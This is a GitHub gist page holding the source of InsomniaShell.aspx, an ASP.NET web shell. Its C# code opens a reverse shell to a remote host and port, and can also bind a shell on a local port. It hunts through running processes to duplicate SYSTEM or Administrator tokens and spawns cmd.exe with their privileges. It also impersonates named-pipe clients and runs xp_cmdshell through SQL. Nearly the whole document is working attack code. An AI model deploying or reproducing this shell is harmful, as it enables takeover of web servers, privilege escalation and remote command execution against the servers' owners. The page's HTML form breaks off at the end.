Skip to content

Instantly share code, notes, and snippets.

@islanddog

islanddog/InsomniaShell.aspx

Created October 8, 2020 19:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save islanddog/59f62f19c4ad313dc2355adcc08d2308 to your computer and use it in GitHub Desktop.
Save islanddog/59f62f19c4ad313dc2355adcc08d2308 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
InsomniaShell.aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Security.Principal" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
//--------------------------------------------------------
// INSOMNIA SECURITY :: InsomniaShell.aspx
//
// .aspx shell helper page
// brett.moore@insomniasec.com :: www.insomniasec.com
//--------------------------------------------------------
// Some c token code portions borrowed from ppl such as
// Cesar Cerrudo and Matt Conover
//--------------------------------------------------------
// Some Bollox To Do Socket Shells With .net
// throw in some more to do token impersonation
// and a bit more for namedpipe impersonation
//--------------------------------------------------------
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public int cb;
public String lpReserved;
public String lpDesktop;
public String lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int Length;
public IntPtr lpSecurityDescriptor;
public bool bInheritHandle;
}
[DllImport("kernel32.dll")]
static extern bool CreateProcess(string lpApplicationName,
string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles,
uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
[In] ref STARTUPINFO lpStartupInfo,
out PROCESS_INFORMATION lpProcessInformation);
public static uint INFINITE = 0xFFFFFFFF;
[DllImport("kernel32", SetLastError = true, ExactSpelling = true)]
internal static extern Int32 WaitForSingleObject(IntPtr handle, Int32 milliseconds);
internal struct sockaddr_in
{
/// <summary>
/// Protocol family indicator.
/// </summary>
public short sin_family;
/// <summary>
/// Protocol port.
/// </summary>
public short sin_port;
/// <summary>
/// Actual address value.
/// </summary>
public int sin_addr;
/// <summary>
/// Address content list.
/// </summary>
//[MarshalAs(UnmanagedType.LPStr, SizeConst=8)]
//public string sin_zero;
public long sin_zero;
}
[DllImport("kernel32.dll")]
static extern IntPtr GetStdHandle(int nStdHandle);
[DllImport("kernel32.dll")]
static extern bool SetStdHandle(int nStdHandle, IntPtr hHandle);
public const int STD_INPUT_HANDLE = -10;
public const int STD_OUTPUT_HANDLE = -11;
public const int STD_ERROR_HANDLE = -12;
[DllImport("kernel32")]
static extern bool AllocConsole();
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern IntPtr WSASocket([In] AddressFamily addressFamily,
[In] SocketType socketType,
[In] ProtocolType protocolType,
[In] IntPtr protocolInfo,
[In] uint group,
[In] int flags
);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern int inet_addr([In] string cp);
[DllImport("ws2_32.dll")]
private static extern string inet_ntoa(uint ip);
[DllImport("ws2_32.dll")]
private static extern uint htonl(uint ip);
[DllImport("ws2_32.dll")]
private static extern uint ntohl(uint ip);
[DllImport("ws2_32.dll")]
private static extern ushort htons(ushort ip);
[DllImport("ws2_32.dll")]
private static extern ushort ntohs(ushort ip);
[DllImport("WS2_32.dll", CharSet=CharSet.Ansi, SetLastError=true)]
internal static extern int connect([In] IntPtr socketHandle,[In] ref sockaddr_in socketAddress,[In] int socketAddressSize);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern int send(
[In] IntPtr socketHandle,
[In] byte[] pinnedBuffer,
[In] int len,
[In] SocketFlags socketFlags
);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern int recv(
[In] IntPtr socketHandle,
[In] IntPtr pinnedBuffer,
[In] int len,
[In] SocketFlags socketFlags
);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern int closesocket(
[In] IntPtr socketHandle
);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern IntPtr accept(
[In] IntPtr socketHandle,
[In, Out] ref sockaddr_in socketAddress,
[In, Out] ref int socketAddressSize
);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern int listen(
[In] IntPtr socketHandle,
[In] int backlog
);
[DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
internal static extern int bind(
[In] IntPtr socketHandle,
[In] ref sockaddr_in socketAddress,
[In] int socketAddressSize
);
public enum TOKEN_INFORMATION_CLASS
{
TokenUser = 1,
TokenGroups,
TokenPrivileges,
TokenOwner,
TokenPrimaryGroup,
TokenDefaultDacl,
TokenSource,
TokenType,
TokenImpersonationLevel,
TokenStatistics,
TokenRestrictedSids,
TokenSessionId
}
[DllImport("advapi32", CharSet = CharSet.Auto)]
public static extern bool GetTokenInformation(
IntPtr hToken,
TOKEN_INFORMATION_CLASS tokenInfoClass,
IntPtr TokenInformation,
int tokeInfoLength,
ref int reqLength);
public enum TOKEN_TYPE
{
TokenPrimary = 1,
TokenImpersonation
}
public enum SECURITY_IMPERSONATION_LEVEL
{
SecurityAnonymous,
SecurityIdentification,
SecurityImpersonation,
SecurityDelegation
}
[DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]
public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("advapi32.dll", EntryPoint = "DuplicateTokenEx")]
public extern static bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess,
ref SECURITY_ATTRIBUTES lpThreadAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLeve, TOKEN_TYPE TokenType,
ref IntPtr DuplicateTokenHandle);
const int ERROR_NO_MORE_ITEMS = 259;
[StructLayout(LayoutKind.Sequential)]
struct TOKEN_USER
{
public _SID_AND_ATTRIBUTES User;
}
[StructLayout(LayoutKind.Sequential)]
public struct _SID_AND_ATTRIBUTES
{
public IntPtr Sid;
public int Attributes;
}
[DllImport("advapi32", CharSet = CharSet.Auto)]
public extern static bool LookupAccountSid
(
[In, MarshalAs(UnmanagedType.LPTStr)] string lpSystemName, // name of local or remote computer
IntPtr pSid, // security identifier
StringBuilder Account, // account name buffer
ref int cbName, // size of account name buffer
StringBuilder DomainName, // domain name
ref int cbDomainName, // size of domain name buffer
ref int peUse // SID type
// ref _SID_NAME_USE peUse // SID type
);
[DllImport("advapi32", CharSet = CharSet.Auto)]
public extern static bool ConvertSidToStringSid(
IntPtr pSID,
[In, Out, MarshalAs(UnmanagedType.LPTStr)] ref string pStringSid);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(
IntPtr hHandle);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(ProcessAccessFlags dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwProcessId);
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VMOperation = 0x00000008,
VMRead = 0x00000010,
VMWrite = 0x00000020,
DupHandle = 0x00000040,
SetInformation = 0x00000200,
QueryInformation = 0x00000400,
Synchronize = 0x00100000
}
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll")]
extern static IntPtr GetCurrentThread();
[DllImport("kernel32.dll", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool DuplicateHandle(IntPtr hSourceProcessHandle,
IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle,
uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);
[DllImport("psapi.dll", SetLastError = true)]
public static extern bool EnumProcessModules(IntPtr hProcess,
[MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] uint[] lphModule,
uint cb,
[MarshalAs(UnmanagedType.U4)] out uint lpcbNeeded);
[DllImport("psapi.dll")]
static extern uint GetModuleBaseName(IntPtr hProcess, uint hModule, StringBuilder lpBaseName, uint nSize);
//-------------------------------------------------------------------------------------------------------------------------------
public const uint PIPE_ACCESS_OUTBOUND = 0x00000002;
public const uint PIPE_ACCESS_DUPLEX = 0x00000003;
public const uint PIPE_ACCESS_INBOUND = 0x00000001;
public const uint PIPE_WAIT = 0x00000000;
public const uint PIPE_NOWAIT = 0x00000001;
public const uint PIPE_READMODE_BYTE = 0x00000000;
public const uint PIPE_READMODE_MESSAGE = 0x00000002;
public const uint PIPE_TYPE_BYTE = 0x00000000;
public const uint PIPE_TYPE_MESSAGE = 0x00000004;
public const uint PIPE_CLIENT_END = 0x00000000;
public const uint PIPE_SERVER_END = 0x00000001;
public const uint PIPE_UNLIMITED_INSTANCES = 255;
public const uint NMPWAIT_WAIT_FOREVER = 0xffffffff;
public const uint NMPWAIT_NOWAIT = 0x00000001;
public const uint NMPWAIT_USE_DEFAULT_WAIT = 0x00000000;
public const uint GENERIC_READ = (0x80000000);
public const uint GENERIC_WRITE = (0x40000000);
public const uint GENERIC_EXECUTE = (0x20000000);
public const uint GENERIC_ALL = (0x10000000);
public const uint CREATE_NEW = 1;
public const uint CREATE_ALWAYS = 2;
public const uint OPEN_EXISTING = 3;
public const uint OPEN_ALWAYS = 4;
public const uint TRUNCATE_EXISTING = 5;
public const int INVALID_HANDLE_VALUE = -1;
public const ulong ERROR_SUCCESS = 0;
public const ulong ERROR_CANNOT_CONNECT_TO_PIPE = 2;
public const ulong ERROR_PIPE_BUSY = 231;
public const ulong ERROR_NO_DATA = 232;
public const ulong ERROR_PIPE_NOT_CONNECTED = 233;
public const ulong ERROR_MORE_DATA = 234;
public const ulong ERROR_PIPE_CONNECTED = 535;
public const ulong ERROR_PIPE_LISTENING = 536;
//-------------------------------------------------------------------------------------------------------------------------------
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr CreateNamedPipe(
String lpName, // pipe name
uint dwOpenMode, // pipe open mode
uint dwPipeMode, // pipe-specific modes
uint nMaxInstances, // maximum number of instances
uint nOutBufferSize, // output buffer size
uint nInBufferSize, // input buffer size
uint nDefaultTimeOut, // time-out interval
IntPtr pipeSecurityDescriptor // SD
);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool ConnectNamedPipe(
IntPtr hHandle, // handle to named pipe
uint lpOverlapped // overlapped structure
);
[DllImport("Advapi32.dll", SetLastError = true)]
public static extern bool ImpersonateNamedPipeClient(
IntPtr hHandle); // handle to named pipe
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetNamedPipeHandleState(
IntPtr hHandle,
IntPtr lpState,
IntPtr lpCurInstances,
IntPtr lpMaxCollectionCount,
IntPtr lpCollectDataTimeout,
StringBuilder lpUserName,
int nMaxUserNameSize
);
//------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
protected void CallbackShell(string server, int port)
{
// This will do a call back shell to the specified server and port
string request = "Shell enroute.......\n";
Byte[] bytesSent = Encoding.ASCII.GetBytes(request);
IntPtr oursocket = IntPtr.Zero;
sockaddr_in socketinfo;
// Create a socket connection with the specified server and port.
oursocket = WSASocket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.IP, IntPtr.Zero, 0, 0);
// Setup And Bind Socket
socketinfo = new sockaddr_in();
socketinfo.sin_family = (short) AddressFamily.InterNetwork;
socketinfo.sin_addr = inet_addr(server);
socketinfo.sin_port = (short) htons((ushort)port);
//Connect
connect(oursocket, ref socketinfo, Marshal.SizeOf(socketinfo));
send(oursocket, bytesSent, request.Length, 0);
SpawnProcessAsPriv(oursocket);
closesocket(oursocket);
}
protected void BindPortShell(int port)
{
// This will bind to a port and then send back a shell
string request = "Shell enroute.......\n";
Byte[] bytesSent = Encoding.ASCII.GetBytes(request);
IntPtr oursocket = IntPtr.Zero;
sockaddr_in socketinfo;
// Create a socket connection with the specified server and port.
oursocket = WSASocket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP, IntPtr.Zero, 0, 0);
// Setup And Bind Socket
socketinfo = new sockaddr_in();
socketinfo.sin_family = (short)AddressFamily.InterNetwork;
uint INADDR_ANY =0x00000000;
socketinfo.sin_addr = (int) htonl(INADDR_ANY);
socketinfo.sin_port = (short)htons((ushort) port);
// Bind
bind(oursocket,ref socketinfo,Marshal.SizeOf(socketinfo));
// Lsten
listen(oursocket, 128);
// Wait for connection
int socketSize = Marshal.SizeOf(socketinfo);
oursocket = accept(oursocket, ref socketinfo, ref socketSize);
send(oursocket, bytesSent, request.Length, 0);
SpawnProcessAsPriv(oursocket);
closesocket(oursocket);
}
protected void SpawnProcess(IntPtr oursocket)
{
// Spawn a process to a socket withouth impersonation
bool retValue;
string Application = Environment.GetEnvironmentVariable("comspec");
PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
STARTUPINFO sInfo = new STARTUPINFO();
SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
pSec.Length = Marshal.SizeOf(pSec);
sInfo.dwFlags = 0x00000101; // STARTF.STARTF_USESHOWWINDOW | STARTF.STARTF_USESTDHANDLES;
// Set Handles
sInfo.hStdInput = oursocket;
sInfo.hStdOutput = oursocket;
sInfo.hStdError = oursocket;
//Spawn Shell
retValue = CreateProcess(Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);
// Wait for it to finish
WaitForSingleObject(pInfo.hProcess, (int)INFINITE);
}
protected void GetSystemToken(ref IntPtr DupeToken)
{
// Enumerate all accessible processes looking for a system token
SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
sa.bInheritHandle = false;
sa.Length = Marshal.SizeOf(sa);
sa.lpSecurityDescriptor = (IntPtr)0;
// Find Token
IntPtr pTokenType = Marshal.AllocHGlobal(4);
int TokenType = 0;
int cb = 4;
string astring = "";
IntPtr token = IntPtr.Zero;
IntPtr duptoken = IntPtr.Zero;
IntPtr hProc = IntPtr.Zero;
IntPtr usProcess = IntPtr.Zero;
uint pid = 0;
for (pid = 0; pid < 9999; pid += 4)
{
hProc = OpenProcess(ProcessAccessFlags.DupHandle, false, pid);
usProcess = GetCurrentProcess();
if (hProc != IntPtr.Zero)
{
for (int x = 1; x <= 9999; x += 4)
{
token = (IntPtr)x;
if (DuplicateHandle(hProc, token, usProcess, out duptoken, 0, false, 2))
{
if (GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb))
{
TokenType = Marshal.ReadInt32(pTokenType);
switch ((TOKEN_TYPE)TokenType)
{
case TOKEN_TYPE.TokenPrimary:
astring = "Primary";
break;
case TOKEN_TYPE.TokenImpersonation:
// Get the impersonation level
GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);
TokenType = Marshal.ReadInt32(pTokenType);
switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)
{
case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
astring = "Impersonation - Anonymous";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
astring = "Impersonation - Identification";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
astring = "Impersonation - Impersonation";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
astring = "Impersonation - Delegation";
break;
}
break;
}
// Get user name
TOKEN_USER tokUser;
string username;
const int bufLength = 256;
IntPtr tu = Marshal.AllocHGlobal(bufLength);
cb = bufLength;
GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenUser, tu, cb, ref cb);
tokUser = (TOKEN_USER)Marshal.PtrToStructure(tu, typeof(TOKEN_USER));
username = DumpAccountSid(tokUser.User.Sid);
Marshal.FreeHGlobal(tu);
if (username.ToString() == "NT AUTHORITY\\\\SYSTEM")
{
// Coverts a primary token to an impersonation
if (DuplicateTokenEx(duptoken, GENERIC_ALL, ref sa, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, ref DupeToken))
{
// Display the token type
//Response.Output.Write("* Duplicated token is {0}<br>", DisplayTokenType(DupeToken));
return;
}
}
}
CloseHandle(duptoken);
}
}
CloseHandle(hProc);
}
}
}
protected void GetAdminToken(ref IntPtr DupeToken)
{
// Enumerate all accessible processes looking for a system token
SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
sa.bInheritHandle = false;
sa.Length = Marshal.SizeOf(sa);
sa.lpSecurityDescriptor = (IntPtr)0;
// Find Token
IntPtr pTokenType = Marshal.AllocHGlobal(4);
int TokenType = 0;
int cb = 4;
string astring = "";
IntPtr token = IntPtr.Zero;
IntPtr duptoken = IntPtr.Zero;
IntPtr hProc = IntPtr.Zero;
IntPtr usProcess = IntPtr.Zero;
uint pid = 0;
for (pid = 0; pid < 9999; pid += 4)
{
hProc = OpenProcess(ProcessAccessFlags.DupHandle, false, pid);
usProcess = GetCurrentProcess();
if (hProc != IntPtr.Zero)
{
for (int x = 1; x <= 9999; x += 4)
{
token = (IntPtr)x;
if (DuplicateHandle(hProc, token, usProcess, out duptoken, 0, false, 2))
{
if (GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb))
{
TokenType = Marshal.ReadInt32(pTokenType);
switch ((TOKEN_TYPE)TokenType)
{
case TOKEN_TYPE.TokenPrimary:
astring = "Primary";
break;
case TOKEN_TYPE.TokenImpersonation:
// Get the impersonation level
GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);
TokenType = Marshal.ReadInt32(pTokenType);
switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)
{
case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
astring = "Impersonation - Anonymous";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
astring = "Impersonation - Identification";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
astring = "Impersonation - Impersonation";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
astring = "Impersonation - Delegation";
break;
}
break;
}
// Get user name
TOKEN_USER tokUser;
string username;
const int bufLength = 256;
IntPtr tu = Marshal.AllocHGlobal(bufLength);
cb = bufLength;
GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenUser, tu, cb, ref cb);
tokUser = (TOKEN_USER)Marshal.PtrToStructure(tu, typeof(TOKEN_USER));
username = DumpAccountSid(tokUser.User.Sid);
Marshal.FreeHGlobal(tu);
if (username.EndsWith("Administrator"))
{
// Coverts a primary token to an impersonation
if (DuplicateTokenEx(duptoken, GENERIC_ALL, ref sa, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, ref DupeToken))
{
// Display the token type
//Response.Output.Write("* Duplicated token is {0}<br>", DisplayTokenType(DupeToken));
return;
}
}
}
CloseHandle(duptoken);
}
}
CloseHandle(hProc);
}
}
}
protected void SpawnProcessAsPriv(IntPtr oursocket)
{
// Spawn a process to a socket
bool retValue;
string Application = Environment.GetEnvironmentVariable("comspec");
PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
STARTUPINFO sInfo = new STARTUPINFO();
SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
pSec.Length = Marshal.SizeOf(pSec);
sInfo.dwFlags = 0x00000101; // STARTF.STARTF_USESHOWWINDOW | STARTF.STARTF_USESTDHANDLES;
IntPtr DupeToken = new IntPtr(0);
// Get the token
GetSystemToken(ref DupeToken);
if (DupeToken == IntPtr.Zero)
GetAdminToken(ref DupeToken);
// Display the token type
//Response.Output.Write("* Creating shell as {0}<br>", DisplayTokenType(DupeToken));
// Set Handles
sInfo.hStdInput = oursocket;
sInfo.hStdOutput = oursocket;
sInfo.hStdError = oursocket;
//Spawn Shell
if (DupeToken == IntPtr.Zero)
retValue = CreateProcess(Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);
else
retValue = CreateProcessAsUser(DupeToken, Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);
// Wait for it to finish
WaitForSingleObject(pInfo.hProcess, (int)INFINITE);
//Close It all up
CloseHandle(DupeToken);
}
//--------------------------------------------------------
// Display the type of token and the impersonation level
//--------------------------------------------------------
protected StringBuilder DisplayTokenType(IntPtr token)
{
IntPtr pTokenType = Marshal.AllocHGlobal(4);
int TokenType = 0;
int cb = 4;
StringBuilder sb = new StringBuilder();
GetTokenInformation(token, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb);
TokenType = Marshal.ReadInt32(pTokenType);
switch ((TOKEN_TYPE)TokenType)
{
case TOKEN_TYPE.TokenPrimary:
sb.Append("Primary");
break;
case TOKEN_TYPE.TokenImpersonation:
// Get the impersonation level
GetTokenInformation(token, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);
TokenType = Marshal.ReadInt32(pTokenType);
switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)
{
case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
sb.Append("Impersonation - Anonymous");
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
sb.Append("Impersonation - Identification");
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
sb.Append("Impersonation - Impersonation");
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
sb.Append("Impersonation - Delegation");
break;
}
break;
}
Marshal.FreeHGlobal(pTokenType);
return sb;
}
protected void DisplayCurrentContext()
{
Response.Output.Write("* Thread executing as {0}, token is {1}<br>", WindowsIdentity.GetCurrent().Name, DisplayTokenType(WindowsIdentity.GetCurrent().Token));
}
protected string DumpAccountSid(IntPtr SID)
{
int cchAccount = 0;
int cchDomain = 0;
int snu = 0;
StringBuilder sb = new StringBuilder();
// Caller allocated buffer
StringBuilder Account = null;
StringBuilder Domain = null;
bool ret = LookupAccountSid(null, SID, Account, ref cchAccount, Domain, ref cchDomain, ref snu);
if (ret == true)
if (Marshal.GetLastWin32Error() == ERROR_NO_MORE_ITEMS)
return "Error";
try
{
Account = new StringBuilder(cchAccount);
Domain = new StringBuilder(cchDomain);
ret = LookupAccountSid(null, SID, Account, ref cchAccount, Domain, ref cchDomain, ref snu);
if (ret)
{
sb.Append(Domain);
sb.Append(@"\\");
sb.Append(Account);
}
else
sb.Append("logon account (no name) ");
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
}
//string SidString = null;
//ConvertSidToStringSid(SID, ref SidString);
//sb.Append("\nSID: ");
//sb.Append(SidString);
return sb.ToString();
}
protected string GetProcessName(uint PID)
{
IntPtr hProc = IntPtr.Zero;
uint[] hMod = new uint[2048];
uint cbNeeded;
int exeNameSize = 255;
StringBuilder exeName = null;
exeName = new StringBuilder(exeNameSize);
hProc = OpenProcess(ProcessAccessFlags.QueryInformation | ProcessAccessFlags.VMRead, false, PID);
if (hProc != IntPtr.Zero)
{
if (EnumProcessModules(hProc, hMod, UInt32.Parse(hMod.Length.ToString()), out cbNeeded))
{
GetModuleBaseName(hProc, hMod[0], exeName, (uint)exeNameSize);
}
}
CloseHandle( hProc );
return exeName.ToString();
}
//***************************************************************************
// DISPLAY THE AVAILABLE TOKENS
//***************************************************************************
protected void DisplayAvailableTokens()
{
IntPtr pTokenType = Marshal.AllocHGlobal(4);
int TokenType = 0;
int cb = 4;
string astring = "";
IntPtr token = IntPtr.Zero;
IntPtr duptoken = IntPtr.Zero;
IntPtr hProc = IntPtr.Zero;
IntPtr usProcess = IntPtr.Zero;
uint pid = 0;
for (pid = 0; pid < 9999; pid+=4)
{
hProc = OpenProcess(ProcessAccessFlags.DupHandle, false, pid);
usProcess = GetCurrentProcess();
if (hProc != IntPtr.Zero)
{
//Response.Output.Write("Opened process PID: {0} : {1}<br>", pid, GetProcessName(pid));
for (int x = 1; x <= 9999; x+=4)
{
token = (IntPtr)x;
if (DuplicateHandle(hProc, token, usProcess, out duptoken, 0, false, 2))
{
//Response.Output.Write("Duplicated handle: {0}<br>", x);
if (GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb))
{
TokenType = Marshal.ReadInt32(pTokenType);
switch ((TOKEN_TYPE)TokenType)
{
case TOKEN_TYPE.TokenPrimary:
astring = "Primary";
break;
case TOKEN_TYPE.TokenImpersonation:
// Get the impersonation level
GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);
TokenType = Marshal.ReadInt32(pTokenType);
switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)
{
case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
astring = "Impersonation - Anonymous";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
astring = "Impersonation - Identification";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
astring = "Impersonation - Impersonation";
break;
case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
astring = "Impersonation - Delegation";
break;
}
break;
}
// Get user name
TOKEN_USER tokUser;
string username;
const int bufLength = 256;
IntPtr tu = Marshal.AllocHGlobal(bufLength);
cb = bufLength;
GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenUser, tu, cb, ref cb);
tokUser = (TOKEN_USER)Marshal.PtrToStructure(tu, typeof(TOKEN_USER));
username = DumpAccountSid(tokUser.User.Sid);
Marshal.FreeHGlobal(tu);
if (username.ToString() == "NT AUTHORITY\\\\SYSTEM")
Response.Output.Write("[{0:0000}] - {2} : {3}</a><br>", pid,x, username, astring);
else if (username.EndsWith("Administrator"))
Response.Output.Write("[{0:0000}] - {2} : {3}</a><br>", pid,x, username, astring);
//else
//Response.Output.Write("[{0:0000}] - {2} : {3}</a><br>", pid, x, username, astring);
}
CloseHandle(duptoken);
}
else
{
//Response.Output.Write("Handle: {0} Error: {1}<br>", x,GetLastError());
}
}
CloseHandle(hProc);
}
else
{
//Response.Output.Write("Failed to open process PID: {0}<br>", pid);
}
}
}
protected void Page_Load(object sender, EventArgs e)
{
}
protected void butConnectBack_Click(object sender, EventArgs e)
{
String host = txtRemoteHost.Text;
int port = Convert.ToInt32(txtRemotePort.Text);
CallbackShell(host, port);
}
protected void butBindPort_Click(object sender, EventArgs e)
{
int port = Convert.ToInt32(txtBindPort.Text);
BindPortShell(port);
}
protected void butCreateNamedPipe_Click(object sender, EventArgs e)
{
String pipeName = "\\\\.\\pipe\\" + txtPipeName.Text;
IntPtr hPipe = IntPtr.Zero;
IntPtr secAttr = IntPtr.Zero;
Response.Output.Write("+ Creating Named Pipe: {0}<br>", pipeName);
hPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, secAttr);
// Check value
if (hPipe.ToInt32() == INVALID_HANDLE_VALUE)
{
Response.Write("- Failed to create named pipe:");
Response.End();
}
Response.Output.Write("+ Created Named Pipe: {0}<br>", pipeName);
// wait for client to connect
Response.Write("+ Waiting for connection...<br>");
ConnectNamedPipe(hPipe, 0);
// Get connected user info
StringBuilder userName = new StringBuilder(256);
if (!GetNamedPipeHandleState(hPipe, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, userName, userName.Capacity))
{
Response.Write("- Error Getting User Info<br>");
Response.End();
}
Response.Output.Write("+ Connection From Client: {0}<br>", userName);
// assume the identity of the client //
Response.Write("+ Impersonating client...<br>");
if (!ImpersonateNamedPipeClient(hPipe))
{
Response.Write("- Failed to impersonate the named pipe.<br>");
CloseHandle(hPipe);
Response.End();
}
CloseHandle(hPipe);
}
protected void butSQLRequest_Click(object sender, EventArgs e)
{
String pipeName = "\\\\.\\pipe\\" + txtPipeName.Text;
String command = "exec master..xp_cmdshell 'dir > \\\\127.0.0.1\\pipe\\" + txtPipeName.Text + "'";
// Make a local sql request to the pipe
String connectionString = "server=127.0.0.1;database=master;uid=" + txtSQLUser.Text + ";password=" + txtSQLPass.Text;
// create a new SqlConnection object with the appropriate connection string
SqlConnection sqlConn = new SqlConnection(connectionString);
Response.Output.Write("+ Sending {0}<br>", command);
// open the connection
sqlConn.Open();
// do some operations ...
// create the command object
SqlCommand sqlComm = new SqlCommand(command, sqlConn);
sqlComm.ExecuteNonQuery();
// close the connection
sqlConn.Close();
}
</script>
<html>
<head runat="server">
<title>InsomniaShell</title>
</head>
<body>
<form id="form1" runat="server">
<div>
